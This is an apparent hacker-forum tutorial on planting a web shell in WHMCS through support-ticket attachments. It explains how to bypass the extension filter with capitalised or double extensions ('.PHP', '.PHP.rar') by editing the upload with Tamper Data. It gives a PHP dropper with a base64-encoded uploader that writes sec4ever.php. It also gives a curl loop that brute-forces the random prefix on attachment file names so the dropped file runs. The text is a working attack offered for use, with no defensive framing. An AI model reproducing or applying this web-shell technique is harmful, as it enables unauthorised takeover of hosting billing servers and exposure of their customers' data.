Credits: sec4ever, MadLeets and all Pakistani Haxors
This Tutorial Is About Uploading Shell On WHMCS Via Attachments
At First , Let's Talk About Mime Types
These Are Extensions
Code:
gif,png,rar,zip,php,asp,aspx
Apache Uses Extension To Run File As It Extension
For Example If You Upload File As This : b0x.gif
Apache Will run it As Picture/Image
And If You Do it As This : b0x.php
The File will Be Run as PHP File
Okay ... In Apache There Are Many Extensions Are Not Defined-ed Like rar
So Let's Start in WHMCS go to submit new ticket
Code:
http://site.tld/whmcs/submitticket.php
You'll See This
So Here The Attachments We've Prospect'z
I : The Extension PHP Is allowed To Be Uploaded
But When We Try 2 Upload PHP File We'll Have This result
To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This
Code:
b0x.PHP
The Changing In Extension Will Be Via Tamepr Data
Then Submit it
Our Ticket Is ready Now .. So We Uploaded PHP
This Was Our 1st Prospect
II : PHP Extension Is not Allowed To Be uploaded on WHMCS
So We'll Use Non-Defined Extension in Apache
Like " rar " So We'll Use Tamper Data Too
We'll Upload As This "b0x.PHP.rar"
Don't Forget Capital Letters
Then We'll Have This
File Uploaded Successfully
But In WHMCS ,, When You Use Attachment or upload One
The File Will Automatically Renamed To Be Like This
Code:
number_filename.extension
For Example Our File b0x.PHP Will Be Like This
Code:
RandomNumber_b0x.PHP
We'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers
Before That .. Let's Make Small Summery
This Code Must be As Attach File
PHP Code:
<?php
$shellcode = "PD9waHANCmVjaG8gJzxiPjxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZv
cm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFt
ZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1l
PSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwi
IHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkg
ew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWydu
YW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2Ug
eyBlY2hvICc8Yj5VcGxvYWQgR0FHQUwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="; $b0x = fopen("sec4ever.php","w"); fwrite($b0x,base64_decode($shellcode)); ?>
This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined
After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php
PHP Code:
<?
error_reporting(0); $url = "http://domain.tld/whmcs/"; $attachfolder = "attachments"; $attach= "b0x.PHP";
for($b0x=100000; $b0x<1000000;$b0x++){ $urls = "$url/$attachfolder/$b0x"; $urls.="_$attach"; $ch = @curl_init();
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_URL, $urls ); $result = @curl_exec($ch);
@curl_close($ch);
} ?>
Edit The Variables To Get The Correct Result - 3xPecteDThen When The Script Ends Browsing URL'z Via Auto-Generate By For Function
The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number !
But The Script Will Generate Shell/Uploader in Sec4ever.php
Credits: sec4ever, MadLeets and all Pakistani Haxors